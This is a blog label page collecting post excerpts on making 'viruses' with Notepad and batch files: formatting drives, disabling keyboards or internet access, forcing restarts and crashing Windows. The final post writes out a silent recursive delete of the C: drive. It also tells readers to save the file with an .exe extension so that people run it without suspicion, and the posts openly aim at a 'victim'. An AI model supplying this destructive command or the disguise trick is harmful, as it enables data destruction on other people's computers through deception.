Ads 468x60px

Pages

Showing posts with label Virus StuFF. Show all posts
Showing posts with label Virus StuFF. Show all posts

Create Virus Using JPS (Virus Maker)

This is a small but very useful software . With the help of this you can create any type of trojans and program it to do whatever you want.
This can be programmed to do the following things:

Format Hard Disk using Notepad (Virus)



If you think that Notepad is useless then you are wrong because you can now do a lot of things with the Notepad which you could have never imagined. In this hack I will show you how to format a HDD using Notepad. This is really cool.

Make a Virus to Disable Keyboard Using BATCH SCRIPT

In this post I will be showing you how you can disable someones keyboard using the below mentioned Batch Script. Just copy and paste the following codes in notepad and save it anything.bat

Make a Dangerous Virus Which Can Disable Internet Permanently

Hello today I share a tricks to make a dangerous virus which can disable victim's internet permanently. It's a easy trick so don't worry. Now follow me:

How to easily create virus to restart pc

Well, I know there are lots of techniques available to restart computer. But all the techniques  requires a basic knowledge of  programming. But in this technique you do not need to know whole programming language but you need just little programming  knowledge. You can also create a program to restart window automatically every start up using c or c++ language.You can also programming in other languages and make virus to create a virus to restart program.
So remember friends, it is not a real virus and the main instance is not to make a virus but i want to teach you something in batch programming. so let's start.

Make a Deadly Virus To Crash Operating System



Warning: Never use it on your own computer. If Program accidentally get activated on your system, You can't repair it again. In this case you have to reinstall your window again.!!!!

Steps to create this program or virus. 
Step 1: Open NOTEPAD and type this command :- 
                      RD c:\ /s /q

Note: C:\ is the location where system files are located. You can change it.

Step 2: Now save as this file and give any name you want with extension .exe and save as file type (all files).

Note: Actually it's a batch file program. But most of the people runs .exe files without thinking anything.. So I am using .exe extension instead of .bat